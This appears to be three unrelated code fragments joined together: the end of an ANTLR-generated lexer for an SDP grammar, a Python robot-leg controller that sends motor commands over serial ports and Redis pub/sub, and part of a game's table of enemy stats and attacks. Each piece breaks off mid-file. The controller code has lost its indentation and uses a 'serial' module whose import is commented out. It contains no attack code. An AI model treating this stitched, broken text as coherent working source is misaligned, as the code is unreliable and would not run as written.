buf.write("\2\2\u0334\u0134\3\2\2\2\u0335\u0336\7\u009b\2\2\u0336")
buf.write("\u0136\3\2\2\2\u0337\u0338\7\u009c\2\2\u0338\u0138\3\2")
buf.write("\2\2\u0339\u033a\7\u009d\2\2\u033a\u013a\3\2\2\2\u033b")
buf.write("\u033c\7\u009e\2\2\u033c\u013c\3\2\2\2\u033d\u033e\7\u009f")
buf.write("\2\2\u033e\u013e\3\2\2\2\u033f\u0340\7\u00a0\2\2\u0340")
buf.write("\u0140\3\2\2\2\u0341\u0342\7\u00a1\2\2\u0342\u0142\3\2")
buf.write("\2\2\u0343\u0344\7\u00a2\2\2\u0344\u0144\3\2\2\2\u0345")
buf.write("\u0346\7\u00a3\2\2\u0346\u0146\3\2\2\2\u0347\u0348\7\u00a4")
buf.write("\2\2\u0348\u0148\3\2\2\2\u0349\u034a\7\u00a5\2\2\u034a")
buf.write("\u014a\3\2\2\2\u034b\u034c\7\u00a6\2\2\u034c\u014c\3\2")
buf.write("\2\2\u034d\u034e\7\u00a7\2\2\u034e\u014e\3\2\2\2\u034f")
buf.write("\u0350\7\u00a8\2\2\u0350\u0150\3\2\2\2\u0351\u0352\7\u00a9")
buf.write("\2\2\u0352\u0152\3\2\2\2\u0353\u0354\7\u00aa\2\2\u0354")
buf.write("\u0154\3\2\2\2\u0355\u0356\7\u00ab\2\2\u0356\u0156\3\2")
buf.write("\2\2\u0357\u0358\7\u00ac\2\2\u0358\u0158\3\2\2\2\u0359")
buf.write("\u035a\7\u00ad\2\2\u035a\u015a\3\2\2\2\u035b\u035c\7\u00ae")
buf.write("\2\2\u035c\u015c\3\2\2\2\u035d\u035e\7\u00af\2\2\u035e")
buf.write("\u015e\3\2\2\2\u035f\u0360\7\u00b0\2\2\u0360\u0160\3\2")
buf.write("\2\2\u0361\u0362\7\u00b1\2\2\u0362\u0162\3\2\2\2\u0363")
buf.write("\u0364\7\u00b2\2\2\u0364\u0164\3\2\2\2\u0365\u0366\7\u00b3")
buf.write("\2\2\u0366\u0166\3\2\2\2\u0367\u0368\7\u00b4\2\2\u0368")
buf.write("\u0168\3\2\2\2\u0369\u036a\7\u00b5\2\2\u036a\u016a\3\2")
buf.write("\2\2\u036b\u036c\7\u00b6\2\2\u036c\u016c\3\2\2\2\u036d")
buf.write("\u036e\7\u00b7\2\2\u036e\u016e\3\2\2\2\u036f\u0370\7\u00b8")
buf.write("\2\2\u0370\u0170\3\2\2\2\u0371\u0372\7\u00b9\2\2\u0372")
buf.write("\u0172\3\2\2\2\u0373\u0374\7\u00ba\2\2\u0374\u0174\3\2")
buf.write("\2\2\u0375\u0376\7\u00bb\2\2\u0376\u0176\3\2\2\2\u0377")
buf.write("\u0378\7\u00bc\2\2\u0378\u0178\3\2\2\2\u0379\u037a\7\u00bd")
buf.write("\2\2\u037a\u017a\3\2\2\2\u037b\u037c\7\u00be\2\2\u037c")
buf.write("\u017c\3\2\2\2\u037d\u037e\7\u00bf\2\2\u037e\u017e\3\2")
buf.write("\2\2\u037f\u0380\7\u00c0\2\2\u0380\u0180\3\2\2\2\u0381")
buf.write("\u0382\7\u00c1\2\2\u0382\u0182\3\2\2\2\u0383\u0384\7\u00c2")
buf.write("\2\2\u0384\u0184\3\2\2\2\u0385\u0386\7\u00c3\2\2\u0386")
buf.write("\u0186\3\2\2\2\u0387\u0388\7\u00c4\2\2\u0388\u0188\3\2")
buf.write("\2\2\u0389\u038a\7\u00c5\2\2\u038a\u018a\3\2\2\2\u038b")
buf.write("\u038c\7\u00c6\2\2\u038c\u018c\3\2\2\2\u038d\u038e\7\u00c7")
buf.write("\2\2\u038e\u018e\3\2\2\2\u038f\u0390\7\u00c8\2\2\u0390")
buf.write("\u0190\3\2\2\2\u0391\u0392\7\u00c9\2\2\u0392\u0192\3\2")
buf.write("\2\2\u0393\u0394\7\u00ca\2\2\u0394\u0194\3\2\2\2\u0395")
buf.write("\u0396\7\u00cb\2\2\u0396\u0196\3\2\2\2\u0397\u0398\7\u00cc")
buf.write("\2\2\u0398\u0198\3\2\2\2\u0399\u039a\7\u00cd\2\2\u039a")
buf.write("\u019a\3\2\2\2\u039b\u039c\7\u00ce\2\2\u039c\u019c\3\2")
buf.write("\2\2\u039d\u039e\7\u00cf\2\2\u039e\u019e\3\2\2\2\u039f")
buf.write("\u03a0\7\u00d0\2\2\u03a0\u01a0\3\2\2\2\u03a1\u03a2\7\u00d1")
buf.write("\2\2\u03a2\u01a2\3\2\2\2\u03a3\u03a4\7\u00d2\2\2\u03a4")
buf.write("\u01a4\3\2\2\2\u03a5\u03a6\7\u00d3\2\2\u03a6\u01a6\3\2")
buf.write("\2\2\u03a7\u03a8\7\u00d4\2\2\u03a8\u01a8\3\2\2\2\u03a9")
buf.write("\u03aa\7\u00d5\2\2\u03aa\u01aa\3\2\2\2\u03ab\u03ac\7\u00d6")
buf.write("\2\2\u03ac\u01ac\3\2\2\2\u03ad\u03ae\7\u00d7\2\2\u03ae")
buf.write("\u01ae\3\2\2\2\u03af\u03b0\7\u00d8\2\2\u03b0\u01b0\3\2")
buf.write("\2\2\u03b1\u03b2\7\u00d9\2\2\u03b2\u01b2\3\2\2\2\u03b3")
buf.write("\u03b4\7\u00da\2\2\u03b4\u01b4\3\2\2\2\u03b5\u03b6\7\u00db")
buf.write("\2\2\u03b6\u01b6\3\2\2\2\u03b7\u03b8\7\u00dc\2\2\u03b8")
buf.write("\u01b8\3\2\2\2\u03b9\u03ba\7\u00dd\2\2\u03ba\u01ba\3\2")
buf.write("\2\2\u03bb\u03bc\7\u00de\2\2\u03bc\u01bc\3\2\2\2\u03bd")
buf.write("\u03be\7\u00df\2\2\u03be\u01be\3\2\2\2\u03bf\u03c0\7\u00e0")
buf.write("\2\2\u03c0\u01c0\3\2\2\2\u03c1\u03c2\7\u00e1\2\2\u03c2")
buf.write("\u01c2\3\2\2\2\u03c3\u03c4\7\u00e2\2\2\u03c4\u01c4\3\2")
buf.write("\2\2\u03c5\u03c6\7\u00e3\2\2\u03c6\u01c6\3\2\2\2\u03c7")
buf.write("\u03c8\7\u00e4\2\2\u03c8\u01c8\3\2\2\2\u03c9\u03ca\7\u00e5")
buf.write("\2\2\u03ca\u01ca\3\2\2\2\u03cb\u03cc\7\u00e6\2\2\u03cc")
buf.write("\u01cc\3\2\2\2\u03cd\u03ce\7\u00e7\2\2\u03ce\u01ce\3\2")
buf.write("\2\2\u03cf\u03d0\7\u00e8\2\2\u03d0\u01d0\3\2\2\2\u03d1")
buf.write("\u03d2\7\u00e9\2\2\u03d2\u01d2\3\2\2\2\u03d3\u03d4\7\u00ea")
buf.write("\2\2\u03d4\u01d4\3\2\2\2\u03d5\u03d6\7\u00eb\2\2\u03d6")
buf.write("\u01d6\3\2\2\2\u03d7\u03d8\7\u00ec\2\2\u03d8\u01d8\3\2")
buf.write("\2\2\u03d9\u03da\7\u00ed\2\2\u03da\u01da\3\2\2\2\u03db")
buf.write("\u03dc\7\u00ee\2\2\u03dc\u01dc\3\2\2\2\u03dd\u03de\7\u00ef")
buf.write("\2\2\u03de\u01de\3\2\2\2\u03df\u03e0\7\u00f0\2\2\u03e0")
buf.write("\u01e0\3\2\2\2\u03e1\u03e2\7\u00f1\2\2\u03e2\u01e2\3\2")
buf.write("\2\2\u03e3\u03e4\7\u00f2\2\2\u03e4\u01e4\3\2\2\2\u03e5")
buf.write("\u03e6\7\u00f3\2\2\u03e6\u01e6\3\2\2\2\u03e7\u03e8\7\u00f4")
buf.write("\2\2\u03e8\u01e8\3\2\2\2\u03e9\u03ea\7\u00f5\2\2\u03ea")
buf.write("\u01ea\3\2\2\2\u03eb\u03ec\7\u00f6\2\2\u03ec\u01ec\3\2")
buf.write("\2\2\u03ed\u03ee\7\u00f7\2\2\u03ee\u01ee\3\2\2\2\u03ef")
buf.write("\u03f0\7\u00f8\2\2\u03f0\u01f0\3\2\2\2\u03f1\u03f2\7\u00f9")
buf.write("\2\2\u03f2\u01f2\3\2\2\2\u03f3\u03f4\7\u00fa\2\2\u03f4")
buf.write("\u01f4\3\2\2\2\u03f5\u03f6\7\u00fb\2\2\u03f6\u01f6\3\2")
buf.write("\2\2\u03f7\u03f8\7\u00fc\2\2\u03f8\u01f8\3\2\2\2\u03f9")
buf.write("\u03fa\7\u00fd\2\2\u03fa\u01fa\3\2\2\2\u03fb\u03fc\7\u00fe")
buf.write("\2\2\u03fc\u01fc\3\2\2\2\u03fd\u03fe\7\u00ff\2\2\u03fe")
buf.write("\u01fe\3\2\2\2\u03ff\u0400\7\u0100\2\2\u0400\u0200\3\2")
buf.write("\2\2\u0401\u0402\7\u0101\2\2\u0402\u0202\3\2\2\2\3\2\2")
return buf.getvalue()
class sdpLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
TAB = 1
LF = 2
CR = 3
SPACE = 4
EXCLAMATION = 5
QUOTE = 6
HASH = 7
DOLLAR = 8
PERCENT = 9
AMPERSAND = 10
APOSTROPHE = 11
LEFT_PAREN = 12
RIGHT_PAREN = 13
ASTERISK = 14
PLUS = 15
COMMA = 16
DASH = 17
PERIOD = 18
SLASH = 19
ZERO = 20
ONE = 21
TWO = 22
THREE = 23
FOUR = 24
FIVE = 25
SIX = 26
SEVEN = 27
EIGHT = 28
NINE = 29
COLON = 30
SEMICOLON = 31
LESS_THAN = 32
EQUALS = 33
GREATER_THAN = 34
QUESTION = 35
AT = 36
CAP_A = 37
CAP_B = 38
CAP_C = 39
CAP_D = 40
CAP_E = 41
CAP_F = 42
CAP_G = 43
CAP_H = 44
CAP_I = 45
CAP_J = 46
CAP_K = 47
CAP_L = 48
CAP_M = 49
CAP_N = 50
CAP_O = 51
CAP_P = 52
CAP_Q = 53
CAP_R = 54
CAP_S = 55
CAP_T = 56
CAP_U = 57
CAP_V = 58
CAP_W = 59
CAP_X = 60
CAP_Y = 61
CAP_Z = 62
LEFT_BRACE = 63
BACKSLASH = 64
RIGHT_BRACE = 65
CARAT = 66
UNDERSCORE = 67
ACCENT = 68
A = 69
B = 70
C = 71
D = 72
E = 73
F = 74
G = 75
H = 76
I = 77
J = 78
K = 79
L = 80
M = 81
N = 82
O = 83
P = 84
Q = 85
R = 86
S = 87
T = 88
U = 89
V = 90
W = 91
X = 92
Y = 93
Z = 94
LEFT_CURLY_BRACE = 95
PIPE = 96
RIGHT_CURLY_BRACE = 97
TILDE = 98
U_0000 = 99
U_0001 = 100
U_0002 = 101
U_0003 = 102
U_0004 = 103
U_0005 = 104
U_0006 = 105
U_0007 = 106
U_0008 = 107
U_000B = 108
U_000C = 109
U_000E = 110
U_000F = 111
U_0010 = 112
U_0011 = 113
U_0012 = 114
U_0013 = 115
U_0014 = 116
U_0015 = 117
U_0016 = 118
U_0017 = 119
U_0018 = 120
U_0019 = 121
U_001A = 122
U_001B = 123
U_001C = 124
U_001D = 125
U_001E = 126
U_001F = 127
U_007F = 128
U_0080 = 129
U_0081 = 130
U_0082 = 131
U_0083 = 132
U_0084 = 133
U_0085 = 134
U_0086 = 135
U_0087 = 136
U_0088 = 137
U_0089 = 138
U_008A = 139
U_008B = 140
U_008C = 141
U_008D = 142
U_008E = 143
U_008F = 144
U_0090 = 145
U_0091 = 146
U_0092 = 147
U_0093 = 148
U_0094 = 149
U_0095 = 150
U_0096 = 151
U_0097 = 152
U_0098 = 153
U_0099 = 154
U_009A = 155
U_009B = 156
U_009C = 157
U_009D = 158
U_009E = 159
U_009F = 160
U_00A0 = 161
U_00A1 = 162
U_00A2 = 163
U_00A3 = 164
U_00A4 = 165
U_00A5 = 166
U_00A6 = 167
U_00A7 = 168
U_00A8 = 169
U_00A9 = 170
U_00AA = 171
U_00AB = 172
U_00AC = 173
U_00AD = 174
U_00AE = 175
U_00AF = 176
U_00B0 = 177
U_00B1 = 178
U_00B2 = 179
U_00B3 = 180
U_00B4 = 181
U_00B5 = 182
U_00B6 = 183
U_00B7 = 184
U_00B8 = 185
U_00B9 = 186
U_00BA = 187
U_00BB = 188
U_00BC = 189
U_00BD = 190
U_00BE = 191
U_00BF = 192
U_00C0 = 193
U_00C1 = 194
U_00C2 = 195
U_00C3 = 196
U_00C4 = 197
U_00C5 = 198
U_00C6 = 199
U_00C7 = 200
U_00C8 = 201
U_00C9 = 202
U_00CA = 203
U_00CB = 204
U_00CC = 205
U_00CD = 206
U_00CE = 207
U_00CF = 208
U_00D0 = 209
U_00D1 = 210
U_00D2 = 211
U_00D3 = 212
U_00D4 = 213
U_00D5 = 214
U_00D6 = 215
U_00D7 = 216
U_00D8 = 217
U_00D9 = 218
U_00DA = 219
U_00DB = 220
U_00DC = 221
U_00DD = 222
U_00DE = 223
U_00DF = 224
U_00E0 = 225
U_00E1 = 226
U_00E2 = 227
U_00E3 = 228
U_00E4 = 229
U_00E5 = 230
U_00E6 = 231
U_00E7 = 232
U_00E8 = 233
U_00E9 = 234
U_00EA = 235
U_00EB = 236
U_00EC = 237
U_00ED = 238
U_00EE = 239
U_00EF = 240
U_00F0 = 241
U_00F1 = 242
U_00F2 = 243
U_00F3 = 244
U_00F4 = 245
U_00F5 | |
<reponame>RobotTeam2/rMule
#!/usr/bin/python3
import time
import sys
import glob
#import serial
import re
import threading
import queue
import os
from logging import getLogger, StreamHandler, FileHandler, Formatter, DEBUG
import redis
#import redis_serial as serial
client = redis.StrictRedis(host='node2.ceph.wator.xyz', port=6379, db=0)
logger = getLogger(__name__)
logger.setLevel(DEBUG)
stream_formatter = Formatter('%(message)s')
stream_handler = StreamHandler()
stream_handler.setLevel(DEBUG)
stream_handler.setFormatter(stream_formatter)
logger.addHandler(stream_handler)
os.makedirs("./log",exist_ok=True)
log_file_name = "./log/log-" + time.strftime("%Y%m%d-%H%M%S", time.strptime(time.ctime()))+".txt"
file_handler = FileHandler(log_file_name)
file_handler.setLevel(DEBUG)
file_formatter = Formatter('[%(asctime)s] %(message)s')
file_handler.setFormatter(file_formatter)
logger.addHandler(file_handler)
logger.propagate = False
key_command_map = {
b'\t':["motion",[["left"]]],
b'/':["motion",[["right"]]],
b'*':["scenario",["walk"]],
b'\x08':["scenario",["back"]], # Windows
b'\x7f':["scenario",["back"]], # Linux
b'7':["motor_command",["up"]],
b'8':["motor_id",0],
b'9':["motor_id",3],
b'-':["motor_command",["move", 0]],
b'4':["motor_command",["down"]],
b'5':["motor_id",1],
b'6':["motor_id",4],
b'+':["motor_command",["move",100]],
b'1':["motion",[["stm_init"]]],
b'2':["motor_id",2],
b'3':["motor_id",5],
b'\r':["command",["stop"]],
b'0':["command",["clear"]],
b'.':["motor_id",999],
b'\x1b':["escape"],
b'[':["escape"]
}
linux_esc_key_command_map = {
b'H':["motor_command",["up"]],
b'A':["motor_id",0],
b'5':["motor_id",3],
b'D':["motor_command",["down"]],
b'E':["motor_id",1],
b'C':["motor_id",4],
b'F':["motion",[["stm_init"]]],
b'B':["motor_id",2],
b'6':["motor_id",5],
b'2':["command",["clear"]],
b'3':["motor_id",999],
b'\x1b':["escape"],
b'[':["escape"]
}
arduino_available = False
stm_available = False
legs = 0
scenario_repeat = 3
motor_height = []
motor_id_mapping = {}
id_motor_mapping = {}
default_motor_id_mapping_2legs = {0:"2",1:"5"}
#
# 2 legs (2番目と3番目のArduinoを外した状態)
#
# Front
# +-----+
# 0:"2" | | 2:"5"
# +-----+
# Back
#
default_motor_id_mapping_4legs = {0:"2",1:"3",2:"5",3:"6"}
#
# 4 legs (3番目のArduinoを外した状態)
#
# Front
# +-----+
# 0:"2" | | 2:"5"
# 1:"3" | | 3:"6"
# +-----+
# Back
#
# right: 0:"2",4:"6",2:"4"
# left : 3:"5",1:"3",5:"7"
#
default_motor_id_mapping_6legs = {0:"2",1:"3",2:"4",3:"5",4:"6",5:"7"}
#
# 6 legs
#
# Front
# +-----+
# 0:"2" | | 3:"5"
# 1:"3" | | 4:"6"
# 2:"4" | | 5:"7"
# +-----+
# Back
#
# right: 0:"2",4:"6",2:"4"
# left : 3:"5",1:"3",5:"7"
#
arduino_id_mapping = {}
'''
scenario_walk = [
[["right"]],
[["wait",2.0]],
[["move",0,0,1],
["move",4,0,1],
["move",2,0,1]],
[["wait",1.0]],
[["move",3,100,1],
["move",1,100,1],
["move",5,100,1]],
[["wait",1.0]],
[["left"]],
[["wait",2.0]],
[["move",3,0,1],
["move",1,0,1],
["move",5,0,1]],
[["wait",1.0]],
[["move",0,100,1],
["move",4,100,1],
["move",2,100,1]],
[["wait",1.0]]
]
'''
left_front_earth = [
["move",1,100,1],
["move",3,100,1],
["move",5,100,1],
]
left_back_earth = [
["move",1,0,1],
["move",3,0,1],
["move",5,0,1],
]
left_front_air = [
["move",1,100,1],
["move",3,100,1],
["move",5,100,1],
]
left_back_air = [
["move",1,0,1],
["move",3,0,1],
["move",5,0,1],
]
right_front_earth = [
["move",0,100,1],
["move",2,100,1],
["move",4,100,1],
]
right_back_earth = [
["move",0,0,1],
["move",2,0,1],
["move",4,0,1],
]
right_front_air = [
["move",0,100,1],
["move",2,100,1],
["move",4,100,1],
]
right_back_air = [
["move",0,0,1],
["move",2,0,1],
["move",4,0,1],
]
wait_space = 2.0
# walk in 3 step.
scenario_walk = [
# move all leg to front by air.
[["right"]],
[["wait",wait_space]],
left_front_air,
[["wait",wait_space]],
[["left"]],
[["wait",wait_space]],
right_front_air,
[["wait",wait_space]],
# move short down all legs.
[["home"]],
[["wait",wait_space]],
# move short down all legs.
left_back_earth,
right_back_earth,
[["home"]],
[["wait",1.0]],
]
'''
scenario_back = [
[["left"]],
[["wait",5.0]],
[["move",0,0,1], ["move",3,0,0],
["move",1,0,0], ["move",4,0,1],
["move",2,0,1], ["move",5,0,0]],
[["wait",5.0]],
[["right"]],
[["wait",5.0]],
[["move",0,100,0], ["move",3,100,1],
["move",1,100,1], ["move",4,100,0],
["move",2,100,0], ["move",5,100,1]],
[["wait",5.0]]
]
'''
scenario_back = [
# move all leg to front by air.
[["right"]],
[["wait",1.0]],
left_back_air,
[["wait",1.0]],
[["left"]],
[["wait",1.0]],
right_back_air,
[["wait",1.0]],
# move short down all legs.
[["alldown"]],
[["wait",1.0]],
# move short down all legs.
left_front_earth,
right_front_earth,
[["wait",1.0]]
]
arduino_ports = []
stm_ports = []
arduino_ser = []
stm_ser = []
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self): return self.impl()
class _GetchUnix:
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch.encode('utf-8')
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
def serial_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(32)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = ['/dev/ttyUSB0','/dev/ttyUSB1','/dev/ttyUSB2','/dev/ttyACM0']
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def setup_serial_ports():
logger.debug("************************************")
logger.debug(" serial port set up start !! ")
logger.debug("************************************")
# detect arduino or stm
comlist = serial_ports()
temp_arduino_ports = []
logger.debug(comlist)
for port in comlist:
logger.debug(port)
ser = serial.Serial(port, 115200,timeout=5.0)
#if port == "/dev/ttyACM0":
# stm_ports.append(port)
# continue
line = ser.readline()
ser.write(b"who:\r\n")
logger.debug("[S] who:\r\n")
start_time = current_time = time.time()
search_arduino_ids = False
while current_time - start_time < 60.0:
line = ser.readline()
if len(line) > 0:
logger.debug("[R] %s" %line)
if not search_arduino_ids:
result = re.search(b"arduino",line)
if result:
logger.debug("arduino")
ser.write(b"info:,\r\n")
search_arduino_ids = True
else:
id0 = ((re.findall(b"id0,[1-9]+",line))[0])[4:]
id1 = ((re.findall(b"id1,[1-9]+",line))[0])[4:]
if id0 and id1:
logger.debug("port id0 = %s, id1 = %s" %(id0,id1))
temp_arduino_ports.append([port,id0,id1])
break
result = re.search(b"stm",line)
if result:
logger.debug("stm")
stm_ports.append(port)
break
time.sleep(0.1)
current_time = time.time()
ser.close()
# motor id check and assign id to detected and sorted port
i = 0
for port in sorted(temp_arduino_ports,key=lambda x:x[1]):
arduino_ports.append(port[0])
if port[1].decode('utf-8') in default_motor_id_mapping_6legs.values():
motor_id_mapping.setdefault(i,port[1].decode('utf-8'))
id_motor_mapping.setdefault(port[1].decode('utf-8'),i)
arduino_id_mapping.setdefault(port[1].decode('utf-8'),i)
else:
logger.debug("id mismatch happens !!")
exit()
if port[2].decode('utf-8') in default_motor_id_mapping_6legs.values():
motor_id_mapping.setdefault(i+len(temp_arduino_ports),port[2].decode('utf-8'))
id_motor_mapping.setdefault(port[2].decode('utf-8'),i+len(temp_arduino_ports))
arduino_id_mapping.setdefault(port[2].decode('utf-8'),i)
else:
logger.debug("id mismatch happens !!")
exit()
i = i + 1
logger.debug("arduino_ports = %s" % arduino_ports)
logger.debug("motor_id_mapping = %s" % motor_id_mapping)
logger.debug("id_motor_mapping = %s" % id_motor_mapping)
logger.debug("arduino_id_mapping = %s" % arduino_id_mapping)
logger.debug("stm_ports = %s" % stm_ports)
# opening serial ports
if len(arduino_ports) > 0:
for i in range(len(arduino_ports)):
for _ in range(5):
try:
s = serial.Serial(arduino_ports[i], 115200,timeout=2.0)
break
except (OSError, serial.SerialException):
time.sleep(1.0)
pass
arduino_ser.append(s)
if len(stm_ports) > 0:
for i in range(len(stm_ports)):
for _ in range(5):
try:
s = serial.Serial(stm_ports[i], 115200,timeout=2.0)
break
except (OSError, serial.SerialException):
time.sleep(1.0)
pass
stm_ser.append(s)
logger.debug("************************************")
logger.debug(" port set up end !! ")
logger.debug("************************************")
def arduino_command(command,sender_queue):
if arduino_available == False:
return
if command[0] == "move":
if len(command) == 4:
item = "legM:id,{0}:xmm,{1}:payload,{2}\r\n".format(motor_id_mapping[command[1]],command[2],command[3])
elif len(command) == 3:
item = "legM:id,{0}:xmm,{1}:payload,{2}\r\n".format(motor_id_mapping[command[1]],command[2],motor_height[command[1]])
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
time.sleep(0.005)
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
time.sleep(0.005)
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
else:
item = "None"
pass
logger.debug("[S] arduino[%1d]: %s" %(arduino_id_mapping[motor_id_mapping[command[1]]] ,item))
time.sleep(0.010)
def stm_command(command,sender_queue):
if stm_available == False:
return
print(command)
if command[0] == "stm_init":
item = "init\r\n"
for i in range(legs):
motor_height[i] = 1
sender_queue[len(arduino_ports)].put(item)
elif command[0] == "right":
if legs == 6:
#item = "right\r\n"
item = "aa\r\n"
for i in range(legs):
motor_height[i] = i % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "left":
if legs == 6:
#item = "left\r\n"
item = "bb\r\n"
for i in range(legs):
motor_height[i] = (i + 1) % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "home":
print(command[0])
if legs == 6:
#item = "cc\r\n"
item = "cc\r\n"
for i in range(legs):
motor_height[i] = (i + 1) % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "up":
item = "up {}\r\n".format(command[1])
motor_height[command[1]] = 0
sender_queue[len(arduino_ports)].put(item)
elif command[0] == "down":
item = "down {}\r\n".format(command[1])
motor_height[command[1]] = 1
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
if item != "None":
logger.debug("[S] stm: %s" % item)
logger.debug("motor_height: %s" % motor_height)
time.sleep(0.002)
def sender(queue,channel):
print('sender channel=<',channel,'>')
toChannel = channel+'->uart'
while True:
item = queue.get()
print('sender item=<',item,'>')
if item is None:
queue.task_done()
break
client.publish(toChannel,item.encode('utf-8'));
def reader(channel):
print('reader channel=<',channel,'>')
p = client.pubsub()
p.subscribe(channel+'<-uart')
for message in p.listen():
print(message)
def motion_player(motion,sender_queue):
logger.debug("motion :: %s" % motion)
for command in motion:
if command[0] == "stm_init":
stm_command(command,sender_queue)
elif command[0] == "right":
stm_command(command,sender_queue)
elif command[0] == "left":
stm_command(command,sender_queue)
elif command[0] == "up":
stm_command(command,sender_queue)
elif command[0] == "down":
stm_command(command,sender_queue)
elif command[0] == "home":
stm_command(command,sender_queue)
elif command[0] == "move":
arduino_command(command,sender_queue)
elif command[0] == "wait":
time.sleep(command[1])
else:
pass
def scenario_player(scenario,sender_queue):
logger.debug("************************************")
logger.debug(" scenario start !! ")
logger.debug("************************************")
if stm_available and legs == 6:
for i in range(scenario_repeat):
logger.debug("---- turn %d / %d ----" % (i+1,scenario_repeat))
for motion in scenario:
motion_player(motion,sender_queue)
else:
pass
logger.debug("************************************")
logger.debug(" scenario end !! ")
logger.debug("************************************")
def menu(sender_queue):
logger.debug("************************************")
logger.debug(" start menu ")
logger.debug("************************************")
escape_mode = False
motor_id = -1
getch = _Getch()
while True:
key = getch()
logger.debug('{0} pressed'.format(key))
if key == b'\x03':
break
if key == b'q':
break
if escape_mode == False and key in key_command_map:
command = key_command_map[key]
elif escape_mode == True and key in linux_esc_key_command_map:
command = linux_esc_key_command_map[key]
else:
continue
if command[0] == "escape":
escape_mode = True
elif command[0] == "scenario":
logger.debug("scenario {}".format(command[1]))
if command[1] == ["walk"]:
scenario_player(scenario_walk,sender_queue)
elif command[1] == ["back"]:
scenario_player(scenario_back,sender_queue)
else:
pass
motor_id = -1
escape_mode = False
elif command[0] == "motion":
logger.debug("motion {}".format(command[1]))
motion_player(command[1],sender_queue)
motor_id = -1
escape_mode = False
elif command[0] == "motor_command":
logger.debug("motor_command {}".format(command[1]))
if motor_id == -1 :
logger.debug("motor_id is not set")
pass
elif motor_id < 999:
if command[1] == ["up"]:
motor_command = [["up",motor_id]]
motion_player(motor_command, sender_queue)
elif command[1] == ["down"]:
motor_command = [["down",motor_id]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",0]:
motor_command = [["move",motor_id,0]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",100]:
motor_command = [["move",motor_id,100]]
motion_player(motor_command, sender_queue)
else:
pass
elif motor_id == 999:
if command[1] == ["up"]:
for i in range(legs):
motor_command = [["up",i]]
motion_player(motor_command, sender_queue)
elif command[1] == ["down"]:
for i in range(legs):
motor_command = [["down",i]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",0]:
for i in range(legs):
motor_command | |
4, 6, 9),
(50, 60, 70, 80, 90),
(50, 50, 50, 50, 50)))},
'dt': {'name': TTLocalizer.SuitDoubleTalker, 'singularname': TTLocalizer.SuitDoubleTalkerS,
'pluralname': TTLocalizer.SuitDoubleTalkerP,
'level': 2,
'hp': (20, 30, 42, 56, 72),
'def': (10, 15, 20, 25, 30),
'freq': (50, 30, 10, 5, 5),
'acc': (65, 70, 75, 80, 85),
'attacks': (
(
'RubberStamp',
(1, 1, 1, 1, 1),
(50, 60, 70, 80, 90),
(5, 5, 5, 5, 5)),
(
'BounceCheck',
(1, 1, 1, 1, 1),
(50, 60, 70, 80, 90),
(5, 5, 5, 5, 5)),
(
'BuzzWord',
(1, 2, 3, 5, 6),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)),
(
'DoubleTalk',
(6, 6, 9, 13, 18),
(50, 60, 70, 80, 90),
(25, 25, 25, 25, 25)),
(
'Jargon',
(3, 4, 6, 9, 12),
(50, 60, 70, 80, 90),
(25, 25, 25, 25, 25)),
(
'MumboJumbo',
(3, 4, 6, 9, 12),
(50, 60, 70, 80, 90),
(20, 20, 20, 20, 20)))},
'ac': {'name': TTLocalizer.SuitAmbulanceChaser, 'singularname': TTLocalizer.SuitAmbulanceChaserS,
'pluralname': TTLocalizer.SuitAmbulanceChaserP,
'level': 3,
'hp': (30, 42, 56, 72, 90),
'def': (15, 20, 25, 30, 35),
'freq': (50, 30, 10, 5, 5),
'acc': (65, 70, 75, 80, 85),
'attacks': (
(
'Shake',
(4, 6, 9, 12, 15),
(75, 75, 75, 75, 75),
(15, 15, 15, 15, 15)),
(
'RedTape',
(6, 8, 12, 15, 19),
(75, 75, 75, 75, 75),
(30, 30, 30, 30, 30)),
(
'Rolodex',
(3, 4, 5, 6, 7),
(75, 75, 75, 75, 75),
(20, 20, 20, 20, 20)),
(
'HangUp',
(2, 3, 4, 5, 6),
(75, 75, 75, 75, 75),
(35, 35, 35, 35, 35)))},
'bs': {'name': TTLocalizer.SuitBackStabber, 'singularname': TTLocalizer.SuitBackStabberS,
'pluralname': TTLocalizer.SuitBackStabberP,
'level': 4,
'hp': (42, 56, 72, 90, 110),
'def': (20, 25, 30, 35, 40),
'freq': (50, 30, 10, 5, 5),
'acc': (35, 40, 45, 50, 55),
'attacks': (
(
'GuiltTrip',
(8, 11, 13, 15, 18),
(60, 75, 80, 85, 90),
(40, 40, 40, 40, 40)),
('RestrainingOrder',
(6, 7, 9, 11, 13),
(50, 65, 70, 75, 90),
(25, 25, 25, 25, 25)),
('FingerWag',
(5, 6, 7, 8, 9),
(50, 55, 65, 75, 80),
(35, 35, 35, 35, 35)))},
